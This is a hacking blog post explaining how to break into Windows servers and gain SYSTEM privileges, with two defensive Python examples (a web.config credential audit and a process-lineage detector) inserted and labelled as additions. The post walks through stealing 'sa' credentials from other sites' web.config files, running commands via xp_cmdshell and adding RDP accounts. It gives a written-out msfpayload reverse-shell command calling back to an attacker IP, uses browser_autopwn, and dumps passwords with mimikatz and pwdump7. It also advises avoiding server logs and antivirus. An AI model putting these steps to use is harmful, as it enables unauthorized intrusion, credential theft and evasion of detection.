Warning - This Website is only for education purposes, By reading these articles you agree that HackingBytes is not responsible in any way for any kind of damage caused by the information provided in these articles.

Wednesday, May 1, 2013

How to hack Windows Servers

Hacking Windows Servers  

By: Rafay


Most of us here can hack websites and servers. But what we hate the most is the error message: Access Denied! We know some methods to bypass certain restrictions, such as symlinks, privilege escalation with local root exploits, and some similar attacks.

But these get the job done only on Linux servers. What about Windows servers?

Here are some ways to bypass certain restrictions on Windows servers or get SYSTEM privileges.
  • Using the "sa" account to execute commands by MSSQL query via the 'xp_cmdshell' stored procedure.
  • Using a meterpreter payload to get a reverse shell over the target machine.
  • Using browser_autopwn. (Really...)
  • Using other tools like pwdump7, mimikatz, etc.

Using the tools is the easy way, but the real fun of hacking lies in the first three methods I mentioned above.

1. Using xp_cmdshell-

Most of the time on Windows servers, we have read permission over the files of other IIS users, which is needed to make this method work.
If we are lucky enough, we will find the login credentials of the "sa" account of the MSSQL server inside the web.config file of any website.
You must be wondering, why only "sa"?
Here, "sa" stands for Super Administrator and, as the name tells, this user has all possible permissions over the server.
The picture below shows the connection string containing login credentials of the "sa" account.

Using this, we can log into the MSSQL server locally (using our web backdoor) as well as remotely. I would recommend remote access because it does not generate webserver logs which would fill the log file with our web backdoor path.
So, after getting the "sa" account, we can log in remotely using HeidiSQL.
HeidiSQL is an awesome tool to connect to remote database servers. You can download it here.
After logging into the MSSQL server with the sa account, we get a list of databases and their contents.
Now we can execute commands using MSSQL queries via xp_cmdshell (with administrator privileges).
Syntax for the query is-
xp_cmdshell '[command]'

For example, if I need to know my current privileges, I would query-
xp_cmdshell 'whoami'


This shows that I am currently NT AUTHORITY\SYSTEM, which most of us know is the highest user in the Windows user hierarchy.
Now we can go for some post-exploitation like enabling RDP, adding accounts and allowing them to access RDP.
Note: If the server does not have the xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online.
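
The exposure this method depends on is a high-privilege SQL login stored in clear text in web.config. The audit below is an added example, not code from the original post; it flags connection strings that use the sa login or embed a password, and the sample file and all names in it are constructed.

```python
import xml.etree.ElementTree as ET

# Constructed sample web.config (not from the original page).
SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="ShopDb" connectionString="Data Source=db01;Initial Catalog=Shop;User ID=sa;Password=ExamplePassw0rd" />
    <add name="ReportsDb" connectionString="Server=db01;Database=Reports;Integrated Security=SSPI" />
    <add name="CmsDb" connectionString="Server=db01;Database=Cms;uid=cms_app;pwd=AnotherExample1" />
  </connectionStrings>
</configuration>"""

USER_KEYS = {"user id", "uid", "user"}
PASSWORD_KEYS = {"password", "pwd"}


def parse_connection_string(value):
    """Split 'key=value;key=value' into a dict with lower-cased keys."""
    pairs = {}
    for part in value.split(";"):
        if "=" in part:
            key, _, val = part.partition("=")
            pairs[key.strip().lower()] = val.strip()
    return pairs


def audit_web_config(xml_text):
    """Return (name, finding) tuples for risky connection strings."""
    findings = []
    for node in ET.fromstring(xml_text).iter("add"):
        conn = node.get("connectionString")
        if conn is None:
            continue  # <add> elements outside connectionStrings
        fields = parse_connection_string(conn)
        name = node.get("name", "?")
        user = next((fields[k] for k in USER_KEYS if k in fields), None)
        if user is not None and user.lower() == "sa":
            findings.append((name, "uses-sa-login"))
        if any(k in fields for k in PASSWORD_KEYS):
            findings.append((name, "plaintext-password"))
    return findings


if __name__ == "__main__":
    for name, finding in audit_web_config(SAMPLE_WEB_CONFIG):
        print(f"{name}: {finding}")
```

Connection strings that use Integrated Security carry no password to read. Commands issued through xp_cmdshell by a sysadmin login run as the SQL Server service account, so a low-privileged service account limits what such a login can reach.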
  
2. Meterpreter Payload-

This method is quite easy and is useful when we cannot read files of other users, but we can execute commands.
Using Metasploit, generate a reverse shell payload binary.
For example-
msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe
Now we will upload this executable to the server using our web backdoor.
Run multi/handler auxiliary at our end. (Make sure the ports are forwarded properly.)
Now it's time to execute the payload.
If everything goes right, we will get a meterpreter session over the target machine as shown below-
We can also use php, asp or other payloads.

3. Browser Autopwn-
This seems odd as a way of hacking a server. But I myself found this a clever way to do the job, especially in scenarios where we are allowed to execute commands but cannot run executables (our payloads) due to software restriction policies in a domain environment.
Most Windows servers have an outdated Internet Explorer, and we can exploit it if we can execute commands.
I think it is clear by now what I'm trying to explain ;)
We can start Internet Explorer from the command line and make it browse to a specific URL.
Syntax for this-
iexplore.exe [URL]
Where URL would be our server address, which would be running browser_autopwn. After that we can use railgun to avoid antivirus detection.
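
Each of the first three methods leaves a recognisable parent/child process pair on the server. The detection logic below is an added example, not part of the original post: it classifies process-creation records by lineage, and the sample events, paths and the `classify`/`scan` names are constructed for illustration.

```python
import ntpath

# Constructed process-creation records, shaped like the parent image, image and
# command-line fields of Sysmon event 1; none of this data is from the page.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "cmdline": "iexplore.exe http://host.example/"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\inetpub\wwwroot\uploads\1.exe", "cmdline": "1.exe"},
]

SHELLS = {"cmd.exe", "powershell.exe"}
SERVICE_PARENTS = {"sqlservr.exe": "database engine", "w3wp.exe": "IIS worker"}


def base(path):
    """Lower-cased file name of a Windows path, on any host OS."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return a finding for a suspicious parent/child pair, else None."""
    parent, child = base(event["parent"]), base(event["image"])
    if parent in SERVICE_PARENTS and child in SHELLS:
        return f"{SERVICE_PARENTS[parent]} spawned {child}"
    if parent == "w3wp.exe" and event["image"].lower().startswith("c:\\inetpub\\"):
        return "IIS worker ran binary from web content directory"
    if child == "iexplore.exe" and parent in SHELLS and "http" in event["cmdline"].lower():
        return "browser started from a shell with a URL argument"
    return None


def scan(events):
    """Return (index, finding) for every event that matches a rule."""
    return [(i, f) for i, e in enumerate(events) if (f := classify(e))]


if __name__ == "__main__":
    for index, finding in scan(SAMPLE_EVENTS):
        print(index, finding)
```

The web content path `c:\inetpub\` is an assumption about the server layout; adjust it to the site roots actually in use.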


4. Using readily available tools-
Tools like pwdump and mimikatz can crack passwords of Windows users.
pwdump7 gives out the NTLM hashes of the users, which can be cracked further using John the Ripper.
The following screenshot shows NTLM hashes from pwdump7:
mimikatz is another great tool which extracts the plain text passwords of users from lsass.exe. The tool is in some language other than English, so do watch tutorials on how to use it.
Following picture shows plain text passwords from mimikatz:
You can google them and learn how to use these tools and what they actually exploit to get the job done for you.
